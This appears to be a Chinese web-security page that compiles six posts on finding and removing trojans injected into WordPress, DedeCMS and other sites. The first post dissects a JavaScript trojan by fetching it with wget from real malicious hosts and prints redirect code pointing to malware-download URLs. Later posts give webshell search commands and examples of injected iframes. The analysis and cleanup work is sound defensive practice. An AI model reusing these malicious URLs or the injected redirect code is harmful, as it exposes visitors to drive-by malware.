以下是小编为大家准备的wordpress挂马清理过程兼木马解剖简记WEB安全(共含6篇),欢迎大家前来参阅。同时,但愿您也能像本文投稿人“没有答案”一样,积极向本站投稿分享好文章。
今天真的载了,居然wordpress也被挂马了,太不可思议了,
事情如下:
晚上发篇文章,突然想到了一个对wordpress进行改进的方案,图片/附件与web分离,当然这个需求可能极少见,因为大多数wordpress都不会遇到这样的问题:空间不够用(直接升级主机了)、对附件的下载打开严重影响到web (如html,css,js)的访问速度。
但进入后台,看到快速发文章的内容框里很怪异,默认就有下面的一段文字,js代码,下面的最近草稿也显示有类似的js代码,心下不好,可能是被挂马了。不过还好,前几天为了试用新买vps性能,把整个wordpress数据库备份了一份,看来还真是所幸。
没有马上理会,记下wp改进方案,但没写几个字,感觉心里不舒服,wp的影响到底有多大,还并不知道。于是在wp后台里随便查看文章,连phpmyadmin查看数据库,初步的评估是,并不严重,只发现了在文章内容字段最后加入了下面的一段js代码,应该并没有数据丢失。这个问题,处理很容易,数据库update就可以了。在进行操作之前,备份整个数据库,保留原始“罪证”材料。于是执行如本文后面附的sql代码,问题得以解决,不想同一个数据库里放的另一个wp也同样的被挂马了,于是同样代码处理之。得解,mysql数据库的其它表,没有仔细检验,大致扫了一下,应该没有挂。明天周五,该周末了,周末再仔细检查一下。
被挂马,定是有漏洞,但漏洞在哪里还并不得而知。也要到周末再查了。
数据备份很重要,要启动自动备份机制,还是要购买并安装到vps上更合适。vps可以容易设置服务器上的定时任务。
写这篇文章时,才意识到怪不得今天访问量比前几天明显的低,被挂马也能也就是其中一个原因,估计还是重要原因。之前还以为可能的目的访客都关注“盐”的问题去了。
这是一段JS木马,请一定谨慎,不要在浏览器中执行。但在本站本文中阅读是安全的,本文url如下www.path8.net/tn/archives/4201 ;但笔者不能保证对本文的也是安全。
清理木马的sql代码
update `pre_posts` set `post_content`=replace(`post_content`,'','')
影响了 4045 行。 ( 查询花费 0.8925 秒 )
-----------------------------
UPDATE `pre2_posts` SET `post_content` = replace( `post_content` , '', '' )影响了 2174 行。 ( 查询花费 3.1435 秒 )
---------------------以下部分为-03-19补写,上面部分也有少量改动。---------------------
致歉:
因为笔者不慎,而导致本文中木马的存在,特向读者朋友们致歉,建议在2011-03-19 12:00 前读过本文、且使用windows操作系统的读者,全盘扫描病毒,以保障安全。
因为笔者主要使用fedora linux,在一定程度上,这也造成了没有及时发现这一问题。
再次杯具的发现:
本周六上午,看到wordpress里有条留言,“在浏览你:“小杯具了,wordpress居然被挂马了/清理过程简记”这个帖子的时候发现自动跳转到一个网页,下载了几个。EXE 用360扫描后发现报病毒,下面是下载信息: pcupdate107_2129.exe www1.firstok-security.rr.nu/retkko107_2129.php?xtev4=nNra76uj2eTZ29CRotz 不知道是我浏览器问题还是怎么回事,当时我用scientific 加 chrome”,心下不好,当时好像是使用wordpress后台发文章时,好像是使用的html代码模式,而不是可视化编辑器模式,直接把js的木马帖进去,那岂不是自己给自己种了木马?! 马上查看文章,速度很慢;为了安全起见趁页面还没有打开,关闭了firefox的js(使用js switch插件实现)。果然,html源代码里那个木马静静的躺着,好像在呲牙咧嘴的嘲笑着我,马上把整个html剪切出来,稍作修饰,切换到可视化编辑器下贴进去。html里的<,>就被自动转义为<与>这样就不会被浏览器当作js代码执行了。——废话了——修改完毕后,对这只木马要解剖一下,这也是前天写篇文章时想做的,但因为已经是深夜12点多,而暂放下。
致谢:
——上面所说的留言由“标点sign555.blog.51cto.com/”所发,在这里深表由衷的感谢!!
木马解剖:
这是一段JS木马,请一定谨慎,不要在浏览器中执行。但在本站本文中阅读是安全的,本文url如下www.path8.net/tn/archives/4201 ;但笔者不能保证对本文的转载也是安全。
分析:这也是清理木马时就想做的事情。木马本身是一段转码过和js字符串,执行时要先unescape反转码,得到一个字符串,然后把该字符串当作一段代码eval执行。
新建一个.html文件,内容如下:
在chrome里查看,但得到提示消息:
看来chrome在安全方面做得确实不错,对于包含恶意代码的网站给出警示消息。分析可能反编码后的代码还是,一段js,再从某个网站上下载木马(一般网页挂马都是这个模式),document.write 写到页面里的这段代码,还是可能被执行的,这不安全的,尽管我在linux下,要换一下输出方式。
使用alert提示框,这样反转码后的字符串是不会被执行的。而且在fedora linux下的alert提示框也是可以使用鼠标选择复制的,这比windows下的alert消息框方便多了!代码如下
小心,这段也是木马document.write('');
看到了,反编码后的字串果然就是个document.write语句,往页面html文档里写入一段js,这段js就来自一个从外部站点上下来的文档,这里还是个动态文件,看来这个域名上有很多木马,以参数传递;或者后面的?kk=33只是用来统计来源的字串,
看看它是什么东西,要有点探索精神~~
这次就不能使用浏览器了,不安全,也不方便;那用什么呢?Linux终端命令行啊!wget 这不是最方便的工具吗?
[feng@fsc tmp]$ wget lessthenaminutehandle.com/js.php?kk=33
[feng@fsc tmp]$ cat js.php?kk=33
function ssdfsc(cefrvwerfv3rg5e,vbeal,ebtal){
var ewefwe=new Date;
var vcwc = ewefwe.getDate()+ebtal;
ewefwe.setDate(vcwc);
var owc3te = ewefwe.toGMTString();
document.cookie=cefrvwerfv3rg5e+“=”+escape(vbeal)+“;expires=”+owc3te;
}
function wsdfsdd(cefrvwerfv3rg5e){if (document.cookie.indexOf(cefrvwerfv3rg5e+“=”)!=-1)return “1”;
return “”;
}
if (wsdfsdd(“eererfero”)==“”){
ssdfsc(“eererfero”,“1”,20);
var derverv=“www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D”;
window.top.location.replace(derverv);
}
还要从别的站点上下载文件,不知道是什么,再来点探索精神,看看:
wget -O xxx.js www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D
以为又是个js,结果是个html文档,比较大,就不贴出来了,参看附件:
xxx.js.html.zip 木马文件,慎重下载
还有,前面的js请求传递的kk=33,分析一下这个站点上是不是多个木马,还仅仅是个统计用的参数
[feng@fsc tmp]$ wget lessthenaminutehandle.com/js.php?kk=32--2011-03-19 12:12:06-- lessthenaminutehandle.com/js.php?kk=32正在解析主机 lessthenaminutehandle.com... 91.193.194.110正在连接 lessthenaminutehandle.com|91.193.194.110|:80... 已连接。已发出 HTTP 请求,正在等待回应... 200 OK长度:573 [text/html]正在保存至: “js.php?kk=32”100%[======================================>] 573 --.-K/s in 0s 2011-03-19 12:12:07 (36.2 MB/s) - 已保存 “js.php?kk=32” [573/573])[feng@fsc tmp]$ cat js.php?kk=32function ssdfsc(cefrvwerfv3rg5e,vbeal,ebtal){ var ewefwe=new Date(); var vcwc = ewefwe.getDate()+ebtal; ewefwe.setDate(vcwc); var owc3te = ewefwe.toGMTString(); document.cookie=cefrvwerfv3rg5e+“=”+escape(vbeal)+“;expires=”+owc3te;}function wsdfsdd(cefrvwerfv3rg5e){ if (document.cookie.indexOf(cefrvwerfv3rg5e+“=”)!=-1)return “1”; return “”;}if (wsdfsdd(“eererfero”)==“”){ ssdfsc(“eererfero”,“1”,20); var derverv=“www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D”; window.top.location.replace(derverv);}
好像一样,那基本上可以认定是个统计参数,马夫们也要来统计马都撒到哪里了,虽然这些马夫很可恶,没有一点 精神,就会拿 技术来搞破坏、谋私利!
貌似很复杂,都十二点半了,不看了,探索精神不能当饭吃,准备吃饭去。
突然联想到,这些所谓有 他,也会说一句类似的话:“ 精神又不能当饭吃!” ——这个最让整个人类 的事情:“吃饭”
有个朋友的网站长期没有人管理,而网站PR=4,于是网站被人攻陷,首页加上了上百条黑链,找我帮忙修复
看到首页密密麻麻的黑链,第一反应就是头大,最简单的办法:格式化后重装系统。但是这个服务器web/数据库都部署在同一台上,数据规模有200多G,当初安装的时候也没有分区,在线迁移数据太麻烦了,只能硬着头皮去修复问题,步骤如下
停掉web服务,免得旧仇未报,又添新恨
找到被挂马的漏洞。一定要找到,不然问题根本解决不了。服务器被挂马主要是两种原因:sql注入或者某种系统性漏洞
sql注入,和代码有关系,不好查。但是只要你的Nginx/PHP不是以root身份运行的,最多被拖库,被挂马的可能性不大
系统性漏洞,这个破坏性很大,但是都会比较著名,马上有人提供解决方案,搜索一下就能找到
所以,找到被挂马的原因是: nginx文件类型错误解析漏洞,这个漏洞很严重,php网站只要支持图片上传都会中招
修补漏洞,nginx文件类型错误解析漏洞 这个漏洞比较好修复,在nginx configure文件里面配置一下即可
搜查木马文件,到代码安装目录执行下面命令
find ./ -iname “*.php” | xargs grep -H -n “eval(base64_decode”
搜出来接近100条结果,这个结果列表很重要,木马都在里面,要一个一个文件打开验证是否是木马,如果是,马上删除掉
最后找到10个木马文件,存放在各种目录,都是php webshell,功能很齐全,用base64编码
清理现场, 去掉首页上的黑链,重启web服务
安全经验
普通服务器被挂马,不用紧张,按上述步骤进行修复
关键服务器(比如部署了用户资金/转账/交易 等服务),被挂马之后,必须要格式化重装,因为webshell的功能实在是非常齐全,攻击者很可能替换掉系统关键程序,比如sshd,nginx等,从此大门打开,随便进出
服务器安装系统要分区,至少应该分 系统区和数据区 两部分,这样重装系统的时候可以不用迁移数据
凡是提供外部端口的服务程序(web server,gate server),一定要用独立的用户运行,千万不要图省事,直接用root
1.最笨的一种应该是直接修改生成的index.htm文件,一般在源代码底部加入一段
2.聪明一点的会修改模板文件,把templets目录下的主要文件源代码同样底部加入
3.稍微厉害一点的会把
4.还有一种是调用.js文件,混在网页中间,利用大多数网页都会有JS调用作为掩护,仔细查找就可以;
5.更高级一点的就是这次我遇到的,模板首页都会调用一个dedeajax.js的文件,他把代码加入到这里面去;
以上是比较常见的一些情况,然后仅仅是删除了木马代码而已,更重要的是要找到根源才行,这样才不会被再次中毒,
织梦CMS挂马漏洞分析解决方案WEB安全
,
根据上次官方发布的解决漏洞办法分析,大多数都是利用会员注册的上传文件漏洞伪装成rar,zip等文件把后门程序上传,从而获得管理权限。所以清楚了网页里的代码之后就要注意查找这些后门程序,大部分都是.php结尾的文件,打开之后显示一堆乱码,直接在upimg里的userup目录查找,如果你网站开的越久内容越多查找起来可能会比较麻烦,可以下载到本地用资源管理器查找*.php文件,找到一个删除一个。
最后的建议就是彻底关闭会员注册功能,或者会员上传功能,大部分个人网站都是用DEDECMS做一个内容发布的网站,很少有需要会员上传什么东西的,所以这个功能其实根本就没有用到,与其这样不如彻底关闭。一个搞安全的朋友告诉我最安全的网站就是全html的网站,能减少程序功能就尽量减少。
网站服务器总是被挂木马,网站的头部被注入了大量的js代码,弄了好久终于解决了,问题的根源是在配置lampp服务器的时候,为了简单方便,给网站根目录赋予了777权限,给了 可趁之机。解决问题的思路就是把权限配置合理。具体方法如下:
1.重新安装linux系统:后台选择32bit ubunt
2.下载xampp服务器: wget url
3.解压xampp: tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt
备注:压缩文件用tar -zcvf ***.tar.gz 文件夹
4.启动服务器:/opt/lampp/lampp start
5.设置安全密码:/opt/lampp/lampp security
6.从其他服务器上拷贝备份文件:scp root@ip:文件位置/文件名 文件名(文件已经备份过)
7.恢复etc/extra/httpd-vhosts.conf,
8.修改extra/httpd.conf,最后一行加入httpd-vhosts.conf
9.修改数据库导入数据文件大小的限制:extra/php.ini
10.新建用户:adduser ×××
11.新建用户组:addgroup ×××
12.给已有的用户增加工作组 usermod -G groupname username
13.改变htdocs文件夹下网站所属用户 chown -R user file,以此用户名和密码来登录FTP,
14.改变网站中上传图片目录的权限为777:chmod -R 777 图片文件夹
网站被反复“挂马”,怎么办?很多企业网管经常发现,在清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接之后,过一会又被“入侵者”加上,这些是非常头疼的问题,
其实利用IIS防火墙可以解决这个难题,使用“正则表达式”模式匹配“挂马”代码,从 IIS 中清除“挂马”代码连接。不用修改硬盘 ASP / PHP 文件,不在担心错误修改客户 ASP / PHP 文件,
对于 <script. src=%AA%BB%CC%DD%EE%FF%GG></script> 这样的加密URL连接,只需要使用一个“正则表达式”,即可从IIS中过滤整个服务器中类似的“挂马”代码连接。对于 <iframe. src=www.xxxx.com/muma.htm width=0 height=0></iframe> 这样的,也只需要通过“正则表达式”,即可轻松清除。
另外,IIS防火墙的智能识别标准HTML网页代码,可以对HTML/ASP/PHP/ASP.NET等网页的顶部和底部的“挂马征”代码进行自动清除操作。
相信大家对Dll木马都是非常熟悉了,
一剑封喉 用系统权限法清理dll木马WEB安全
。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理,这个家伙的隐蔽性非常强,它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去,让你找不到,即使找到了也难以清除,因为正常的进程正在调用它嘛。
我用的是mcafee的杀毒软件,比如说它现在报告
defds.dll:C: Documents and SettingsAdministratorLocal Settings Temp defds.dll删除失败
fdgeg.com:C:Windowsimefdgeg.com删除失败
那么可以知道defds.dll应该是个dll木马 我们可以通过冰刃icesword来查看系统的进程,找到调用该dll文件的进程 比如说是notepad.exe 我们可以先尝试着终止该进程 该进程如果终止后过不了多久又重新运行(而我并没有运行记事本)那么我们可以判定fdgeg.com就是notepad.exe的的守护进程 当它发现它所监视的notepad.exe进程被终止后会立刻将notepad.exe重新启用
现在我们可以:我的电脑-----工具----文件夹选项-----查看在高级设置的选项下去掉”简单文件共享”的钩子(我的电脑是XP操作系统,NTFS磁盘格式)
然后到C:Windo0wsime下找到fdgeg.com 右键选择属性 在属性中选择”安全” 单击”高级” 在弹出的窗口中使”从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目”不被选中,再在弹出的窗口中单击”删除”,再依次单击”确定”,
《一剑封喉 用系统权限法清理dll木马WEB安全》()。这样就没有任何用户可以使fdgeg.com工作了。
通过icesword终止notepad.exe 然后到C: Documents and SettingsAdministratorLocal Settings Temp中删除defds.dll 然后到C:Windowsime中再找到fdgeg.com 右键属性在属性中选择”安全” 单击”高级” 在弹出的窗口中选中”从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目” 然后删除它即可
最后别忘了在注册表的启动项中将这个dll木马删除
这样 我们就彻底将这个讨厌的dll木马从我们的电脑中清除了。
